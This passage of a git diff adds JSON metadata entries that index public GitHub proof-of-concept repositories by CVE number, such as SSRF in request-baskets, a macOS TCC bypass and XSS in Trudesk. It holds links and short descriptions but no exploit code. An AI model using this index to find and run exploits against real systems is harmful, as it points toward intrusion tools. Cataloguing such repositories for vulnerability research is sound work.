"updated_at": "2024-01-16T15:01:33Z", + "pushed_at": "2024-01-16T15:04:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26607.json b/2023/CVE-2023-26607.json new file mode 100644 index 0000000000..5fae88079b --- /dev/null +++ b/2023/CVE-2023-26607.json @@ -0,0 +1,33 @@ +[ + { + "id": 691911118, + "name": "linux-4.1.15_CVE-2023-26607", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2023-26607", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2023-26607", + "description": null, + "fork": false, + "created_at": "2023-09-15T06:42:36Z", + "updated_at": "2023-09-15T06:47:20Z", + "pushed_at": "2023-09-15T08:37:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26609.json b/2023/CVE-2023-26609.json new file mode 100644 index 0000000000..38f20643a5 --- /dev/null +++ b/2023/CVE-2023-26609.json @@ -0,0 +1,33 @@ +[ + { + "id": 744066325, + "name": "CVE-2023-26609", + "full_name": "D1G17\/CVE-2023-26609", + "owner": { + "login": "D1G17", + "id": 156820616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156820616?v=4", + "html_url": "https:\/\/github.com\/D1G17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1G17\/CVE-2023-26609", + "description": "Exploit information for CVE-2023-26609 ", + "fork": false, + "created_at": "2024-01-16T15:02:39Z", + "updated_at": "2024-01-16T15:02:40Z", + "pushed_at": "2024-01-16T15:05:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26692.json b/2023/CVE-2023-26692.json new file mode 100644 index 0000000000..93033374b8 --- /dev/null +++ b/2023/CVE-2023-26692.json @@ -0,0 +1,33 @@ +[ + { + "id": 621357031, + "name": "CVE-2023-26692", + "full_name": "bigzooooz\/CVE-2023-26692", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2023-26692", + "description": "ZCBS\/ZBBS\/ZPBS v4.14k - Reflected XSS", + "fork": false, + "created_at": "2023-03-30T13:56:24Z", + "updated_at": "2023-03-30T14:33:20Z", + "pushed_at": "2023-03-30T14:29:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26785.json b/2023/CVE-2023-26785.json new file mode 100644 index 0000000000..0ceb3439b3 --- /dev/null +++ b/2023/CVE-2023-26785.json @@ -0,0 +1,33 @@ +[ + { + "id": 851466770, + "name": "CVE-2023-26785", + "full_name": "Ant1sec-ops\/CVE-2023-26785", + "owner": { + "login": "Ant1sec-ops", + "id": 98224710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98224710?v=4", + "html_url": "https:\/\/github.com\/Ant1sec-ops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ant1sec-ops\/CVE-2023-26785", + "description": "Authenticated Code execution", + "fork": false, + "created_at": "2024-09-03T06:38:33Z", + "updated_at": "2024-10-21T13:17:46Z", + "pushed_at": "2024-10-18T05:20:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26818.json b/2023/CVE-2023-26818.json new file mode 100644 index 0000000000..3d02b5d4df --- /dev/null +++ b/2023/CVE-2023-26818.json @@ -0,0 +1,33 @@ +[ + { + "id": 685061399, + "name": "CVE-2023-26818", + "full_name": "Zeyad-Azima\/CVE-2023-26818", + "owner": { + "login": "Zeyad-Azima", + "id": 62406753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4", + "html_url": "https:\/\/github.com\/Zeyad-Azima", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2023-26818", + "description": "CVE-2023-26818 Exploit MacOS TCC Bypass W\/ Telegram", + "fork": false, + "created_at": "2023-08-30T12:40:50Z", + "updated_at": "2024-08-25T03:35:07Z", + "pushed_at": "2024-06-06T20:14:42Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26852.json b/2023/CVE-2023-26852.json new file mode 100644 index 0000000000..feb5183ce2 --- /dev/null +++ b/2023/CVE-2023-26852.json @@ -0,0 +1,33 @@ +[ + { + "id": 626287396, + "name": "CVE-2023-26852-Textpattern-v4.8.8-and-", + "full_name": "leekenghwa\/CVE-2023-26852-Textpattern-v4.8.8-and-", + "owner": { + "login": "leekenghwa", + "id": 45155253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45155253?v=4", + "html_url": "https:\/\/github.com\/leekenghwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leekenghwa\/CVE-2023-26852-Textpattern-v4.8.8-and-", + "description": "Textpattern v4.8.8 and Below are vulnerable to Unrestricted File Upload Leading to Remote Code Execution", + "fork": false, + "created_at": "2023-04-11T07:00:04Z", + "updated_at": "2023-04-11T07:00:04Z", + "pushed_at": "2023-04-12T03:29:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26866.json b/2023/CVE-2023-26866.json new file mode 100644 index 0000000000..280aac58c7 --- /dev/null +++ b/2023/CVE-2023-26866.json @@ -0,0 +1,33 @@ +[ + { + "id": 622352794, + "name": "CVE-2023-26866", + "full_name": "lionelmusonza\/CVE-2023-26866", + "owner": { + "login": "lionelmusonza", + "id": 20681955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20681955?v=4", + "html_url": "https:\/\/github.com\/lionelmusonza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lionelmusonza\/CVE-2023-26866", + "description": null, + "fork": false, + "created_at": "2023-04-01T21:19:05Z", + "updated_at": "2023-04-01T21:19:05Z", + "pushed_at": "2023-04-01T21:28:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26976.json b/2023/CVE-2023-26976.json new file mode 100644 index 0000000000..303721704b --- /dev/null +++ b/2023/CVE-2023-26976.json @@ -0,0 +1,33 @@ +[ + { + "id": 626381488, + "name": "CVE-2023-26976_tenda_AC6_stack_overflow", + "full_name": "FzBacon\/CVE-2023-26976_tenda_AC6_stack_overflow", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2023-26976_tenda_AC6_stack_overflow", + "description": null, + "fork": false, + "created_at": "2023-04-11T11:02:48Z", + "updated_at": "2023-04-18T05:24:22Z", + "pushed_at": "2023-10-20T08:08:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26982.json b/2023/CVE-2023-26982.json new file mode 100644 index 0000000000..82f99112ed --- /dev/null +++ b/2023/CVE-2023-26982.json @@ -0,0 +1,64 @@ +[ + { + "id": 602073215, + "name": "CVE-2023-26982", + "full_name": "bypazs\/CVE-2023-26982", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2023-26982", + "description": "Trudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create Ticket function.", + "fork": false, + "created_at": "2023-02-15T12:49:38Z", + "updated_at": "2023-03-29T02:01:52Z", + "pushed_at": "2023-03-29T02:15:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 602123461, + "name": "Duplicate-of-CVE-2023-26982", + "full_name": "bypazs\/Duplicate-of-CVE-2023-26982", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/Duplicate-of-CVE-2023-26982", + "description": "Trudesk version 1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the tickets `Create\/Modify Ticket Tags` on admin role.", + "fork": false, + "created_at": "2023-02-15T14:46:44Z", + "updated_at": "2023-03-29T02:04:12Z", + "pushed_at": "2023-02-15T14:52:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26984.json b/2023/CVE-2023-26984.json new file mode 100644 index 0000000000..d7bc4737a1 --- /dev/null +++ b/2023/CVE-2023-26984.json @@ -0,0 +1,33 @@ +[ + { + "id": 606815438, + "name": "CVE-2023-26984", + "full_name": "bypazs\/CVE-2023-26984", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2023-26984", + "description": "An issue in the password reset function of Peppermint v0.2.4 allows attackers to access the emails and passwords of the Tickets page via a crafted request.", + "fork": false, + "created_at": "2023-02-26T16:45:50Z", + "updated_at": "2023-03-29T02:08:33Z", + "pushed_at": "2023-03-29T02:15:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27035.json b/2023/CVE-2023-27035.json new file mode 100644 index 0000000000..ee8a04bb2e --- /dev/null +++ b/2023/CVE-2023-27035.json @@ -0,0 +1,33 @@ +[ + { + "id": 634566047, + "name": "CVE-2023-27035", + "full_name": "fivex3\/CVE-2023-27035", + "owner": { + "login": "fivex3", + "id": 125558903, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125558903?v=4", + "html_url": "https:\/\/github.com\/fivex3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fivex3\/CVE-2023-27035", + "description": null, + "fork": false, + "created_at": "2023-04-30T14:52:21Z", + "updated_at": "2023-07-01T06:32:21Z", + "pushed_at": "2023-04-30T14:53:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27100.json b/2023/CVE-2023-27100.json new file mode 100644 index 0000000000..cdc5035acc --- /dev/null +++ b/2023/CVE-2023-27100.json @@ -0,0 +1,64 @@ +[ + { + "id": 624761642, + "name": "CVE-2023-27100", + "full_name": "DarokNET\/CVE-2023-27100", + "owner": { + "login": "DarokNET", + "id": 61823580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61823580?v=4", + "html_url": "https:\/\/github.com\/DarokNET", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarokNET\/CVE-2023-27100", + "description": null, + "fork": false, + "created_at": "2023-04-07T07:38:48Z", + "updated_at": "2023-04-28T12:33:35Z", + "pushed_at": "2023-04-07T09:14:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803311875, + "name": "CVE-2023-27100", + "full_name": "fabdotnet\/CVE-2023-27100", + "owner": { + "login": "fabdotnet", + "id": 169522306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169522306?v=4", + "html_url": "https:\/\/github.com\/fabdotnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fabdotnet\/CVE-2023-27100", + "description": null, + "fork": false, + "created_at": "2024-05-20T13:35:39Z", + "updated_at": "2024-05-20T13:37:25Z", + "pushed_at": "2024-05-20T13:37:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27163.json b/2023/CVE-2023-27163.json new file mode 100644 index 0000000000..ce74fc96eb --- /dev/null +++ b/2023/CVE-2023-27163.json @@ -0,0 +1,544 @@ +[ + { + "id": 665224442, + "name": "CVE-2023-27163", + "full_name": "entr0pie\/CVE-2023-27163", + "owner": { + "login": "entr0pie", + "id": 73120825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73120825?v=4", + "html_url": "https:\/\/github.com\/entr0pie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/entr0pie\/CVE-2023-27163", + "description": "Proof-of-Concept for Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1)", + "fork": false, + "created_at": "2023-07-11T18:08:05Z", + "updated_at": "2024-12-29T11:24:36Z", + "pushed_at": "2023-08-09T15:11:09Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cybersecurity", + "exploit", + "go", + "golang", + "poc", + "python3", + "request-baskets", + "server-side-request-forgery", + "ssrf" + ], + "visibility": "public", + "forks": 5, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 668120487, + "name": "cve-2023-27163", + "full_name": "seanrdev\/cve-2023-27163", + "owner": { + "login": "seanrdev", + "id": 20375619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20375619?v=4", + "html_url": "https:\/\/github.com\/seanrdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seanrdev\/cve-2023-27163", + "description": "To assist in enumerating the webserver behind the webserver SSRF CVE-2023-27163", + "fork": false, + "created_at": "2023-07-19T04:35:58Z", + "updated_at": "2023-07-31T23:33:29Z", + "pushed_at": "2023-07-22T05:56:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 668492282, + "name": "CVE-2023-27163", + "full_name": "overgrowncarrot1\/CVE-2023-27163", + "owner": { + "login": "overgrowncarrot1", + "id": 78485709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4", + "html_url": "https:\/\/github.com\/overgrowncarrot1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2023-27163", + "description": "CVE-2023-27163", + "fork": false, + "created_at": "2023-07-20T00:18:38Z", + "updated_at": "2023-07-20T00:19:34Z", + "pushed_at": "2023-07-20T00:58:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 671018679, + "name": "CVE-2023-27163-POC", + "full_name": "ThickCoco\/CVE-2023-27163-POC", + "owner": { + "login": "ThickCoco", + "id": 26300723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26300723?v=4", + "html_url": "https:\/\/github.com\/ThickCoco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThickCoco\/CVE-2023-27163-POC", + "description": "Poc of SSRF for Request-Baskets (CVE-2023-27163)", + "fork": false, + "created_at": "2023-07-26T11:00:59Z", + "updated_at": "2024-09-18T18:11:04Z", + "pushed_at": "2023-07-26T13:35:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 671124763, + "name": "CVE-2023-27163", + "full_name": "davuXVI\/CVE-2023-27163", + "owner": { + "login": "davuXVI", + "id": 99289325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99289325?v=4", + "html_url": "https:\/\/github.com\/davuXVI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davuXVI\/CVE-2023-27163", + "description": "PoC CVE-2023-27163, SSRF, request-baskets hasta v1.2.1", + "fork": false, + "created_at": "2023-07-26T15:37:26Z", + "updated_at": "2023-08-05T10:44:44Z", + "pushed_at": "2023-07-26T16:20:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 674953694, + "name": "CVE-2023-27163-AND-Mailtrail-v0.53", + "full_name": "HusenjanDev\/CVE-2023-27163-AND-Mailtrail-v0.53", + "owner": { + "login": "HusenjanDev", + "id": 88688451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88688451?v=4", + "html_url": "https:\/\/github.com\/HusenjanDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HusenjanDev\/CVE-2023-27163-AND-Mailtrail-v0.53", + "description": "Requests Baskets (CVE-2023-27163) and Mailtrail v0.53", + "fork": false, + "created_at": "2023-08-05T09:32:00Z", + "updated_at": "2024-01-07T07:09:20Z", + "pushed_at": "2023-08-05T09:36:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 676501688, + "name": "CVE-2023-27163", + "full_name": "rvizx\/CVE-2023-27163", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2023-27163", + "description": "CVE-2023-27163 - Request Baskets SSRF", + "fork": false, + "created_at": "2023-08-09T10:47:01Z", + "updated_at": "2024-11-02T19:55:00Z", + "pushed_at": "2023-08-09T20:44:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-27163", + "exploit", + "request-baskets", + "ssrf" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 677914975, + "name": "CVE-2023-27163", + "full_name": "thomas-osgood\/CVE-2023-27163", + "owner": { + "login": "thomas-osgood", + "id": 20747585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20747585?v=4", + "html_url": "https:\/\/github.com\/thomas-osgood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomas-osgood\/CVE-2023-27163", + "description": "Golang PoC for CVE-2023-27163 Mailtrail Exploit", + "fork": false, + "created_at": "2023-08-13T04:19:50Z", + "updated_at": "2024-11-19T01:29:58Z", + "pushed_at": "2023-08-14T06:11:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 677969095, + "name": "CVE-2023-27163", + "full_name": "cowsecurity\/CVE-2023-27163", + "owner": { + "login": "cowsecurity", + "id": 74612612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4", + "html_url": "https:\/\/github.com\/cowsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2023-27163", + "description": "CVE-2023-27163 Request-Baskets v1.2.1 - Server-side request forgery (SSRF)", + "fork": false, + "created_at": "2023-08-13T08:49:24Z", + "updated_at": "2023-08-13T08:52:33Z", + "pushed_at": "2023-08-13T09:04:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 684184490, + "name": "CVE-2023-27163-InternalProber", + "full_name": "samh4cks\/CVE-2023-27163-InternalProber", + "owner": { + "login": "samh4cks", + "id": 63656641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63656641?v=4", + "html_url": "https:\/\/github.com\/samh4cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/samh4cks\/CVE-2023-27163-InternalProber", + "description": "A tool to perform port scanning using vulnerable Request-Baskets", + "fork": false, + "created_at": "2023-08-28T16:19:21Z", + "updated_at": "2024-08-12T20:32:38Z", + "pushed_at": "2023-08-28T17:52:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 694447661, + "name": "CVE-2023-27163", + "full_name": "Hamibubu\/CVE-2023-27163", + "owner": { + "login": "Hamibubu", + "id": 108554878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108554878?v=4", + "html_url": "https:\/\/github.com\/Hamibubu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hamibubu\/CVE-2023-27163", + "description": "Python implementation of CVE-2023-27163", + "fork": false, + "created_at": "2023-09-21T02:43:02Z", + "updated_at": "2023-09-21T02:55:11Z", + "pushed_at": "2023-09-21T03:05:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733795826, + "name": "basketcraft", + "full_name": "KharimMchatta\/basketcraft", + "owner": { + "login": "KharimMchatta", + "id": 47448636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47448636?v=4", + "html_url": "https:\/\/github.com\/KharimMchatta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KharimMchatta\/basketcraft", + "description": "this is a script that exploits the CVE-2023-27163 vulnerability which is request-basket SSRF", + "fork": false, + "created_at": "2023-12-20T06:29:18Z", + "updated_at": "2024-01-05T18:44:44Z", + "pushed_at": "2023-12-20T07:00:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736614226, + "name": "CVE-2023-27163", + "full_name": "MasterCode112\/CVE-2023-27163", + "owner": { + "login": "MasterCode112", + "id": 105772414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105772414?v=4", + "html_url": "https:\/\/github.com\/MasterCode112", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MasterCode112\/CVE-2023-27163", + "description": "Proof of Concept for Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1)", + "fork": false, + "created_at": "2023-12-28T11:36:37Z", + "updated_at": "2023-12-28T11:45:13Z", + "pushed_at": "2024-01-10T07:57:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739001610, + "name": "CVE-2023-27163", + "full_name": "Rubioo02\/CVE-2023-27163", + "owner": { + "login": "Rubioo02", + "id": 153825296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153825296?v=4", + "html_url": "https:\/\/github.com\/Rubioo02", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubioo02\/CVE-2023-27163", + "description": "A exploit for the CVE-2023-27163 (SSRF) vulnerability in the web application request-baskets (<= v.1.2.1)", + "fork": false, + "created_at": "2024-01-04T14:46:13Z", + "updated_at": "2024-01-04T17:04:49Z", + "pushed_at": "2024-01-04T16:40:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 739760866, + "name": "CVE-2023-27163", + "full_name": "madhavmehndiratta\/CVE-2023-27163", + "owner": { + "login": "madhavmehndiratta", + "id": 43489174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43489174?v=4", + "html_url": "https:\/\/github.com\/madhavmehndiratta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/madhavmehndiratta\/CVE-2023-27163", + "description": "PoC for SSRF in request-baskets v1.2.1 (CVE-2023-27163)", + "fork": false, + "created_at": "2024-01-06T13:16:29Z", + "updated_at": "2024-01-06T15:53:16Z", + "pushed_at": "2024-01-06T15:52:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 820848497, + "name": "CVE-2023-27163-ssrf-to-port-scanning", + "full_name": "Rishabh-Kumar-Cyber-Sec\/CVE-2023-27163-ssrf-to-port-scanning", + "owner": { + "login": "Rishabh-Kumar-Cyber-Sec", + "id": 58937379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58937379?v=4", + "html_url": "https:\/\/github.com\/Rishabh-Kumar-Cyber-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rishabh-Kumar-Cyber-Sec\/CVE-2023-27163-ssrf-to-port-scanning", + "description": "It is a simple script to automate internal port scanning dueto SSRF in requests-baskets v 1.2.1. this script can also assisst in solving 'SAU' machine from hackthebox", + "fork": false, + "created_at": "2024-06-27T09:48:14Z", + "updated_at": "2024-06-27T09:53:26Z", + "pushed_at": "2024-06-27T09:53:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + 